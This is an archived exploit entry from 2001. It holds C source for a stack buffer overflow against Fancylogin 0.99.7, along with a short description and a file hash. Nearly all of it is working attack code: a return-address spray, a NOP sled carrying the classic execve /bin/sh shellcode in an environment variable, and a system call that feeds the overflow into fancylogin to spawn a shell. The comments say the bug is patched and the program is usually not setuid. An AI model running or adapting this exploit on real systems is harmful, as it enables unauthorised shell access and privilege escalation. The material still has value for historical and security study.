Fancylogin 0.99.7 buffer overflow exploit. Fancylogin is usually not +s so this exploit isn't that dangerous. Tested on debian potato and kernel 2.2.18 and 2.2.19.
29d03dc71d859bbe4e1a2875ecdcaa1d77c2adb10f17069da1e18b83a08771c0
/***********************************************
* Fancylogin 0.99.7 bufferoverflow exploit
* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
* Exploited by gh0st
*
* There exists a very simple and stupid
* bug in fancylogin, argv[2] is strcpy'd in
* a to a small array without bounds check.
* EIP can easily be overwritte, this is
* standard exploit code...
* Fancylogin is usually not +s so this
* exploit isn't that dangerous ;)
*
* Thx to aleph one for his excellent article
* about buffer overflows
*
* Greetings fly to: huega, koerk, chef,
* anarchy, bullet
*
* This exploit was written during the
* easterhegg 2001 @ CCC Hamburg
*
* usage: fancylogin_ex [buffer_size] [offset]
*
* Tested on debian potato and kernel 2.2.18
* and 2.2.19 using a self-compiled
* fancylogin 0.99.7.
* And on rocklinux 1.3.11 with a prebuilt
* binary of fancylogin.
*
* The fancylogin team is aware of this bug
* and has released a patch.
*
***********************************************/
// Exploit worked for me using this offset
#define OFFSET 3500
// and this buffersize ...
#define BUFFER_SIZE 4100
#define EGG_SIZE 1200
// Standard linux shellcode by aleph one
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
unsigned long get_sp(void) {
__asm__("movl %esp,%eax");
}
int main(int argc, char *argv[]) {
char *buff, *ptr, *egg;
long *addr_ptr, addr;
int offset=OFFSET, bsize=BUFFER_SIZE;
int i, eggsize=EGG_SIZE;
printf("[ Fancylogin 0.99.7 exploit ]\n[ exploited by gh0st @ easterhegg 2001 ]\n[ usage: %s [size] [offset] ]\n",argv[0]);
if(argc>1) bsize=atoi(argv[1]);
if(argc>2) offset=atoi(argv[2]);
buff=malloc(bsize);
egg=malloc(eggsize);
addr=get_sp()-offset;
printf("+ Using address: 0x%x\n", addr);
ptr=buff;
addr_ptr=(long *)ptr;
for (i=0;i<bsize;i+=4) *(addr_ptr++)=addr;
ptr=egg;
for (i=0;i<eggsize-strlen(shellcode)-1;i++) *(ptr++)=0x90;
for(i=0;i<strlen(shellcode);i++) *(ptr++)=shellcode[i];
buff[bsize-1]='\0';
egg[eggsize-1]='\0';
memcpy(egg,"EGG=",4);
putenv(egg);
memcpy(buff,"RET=",4);
putenv(buff);
system("fancylogin -r $RET bla");
return 0;
}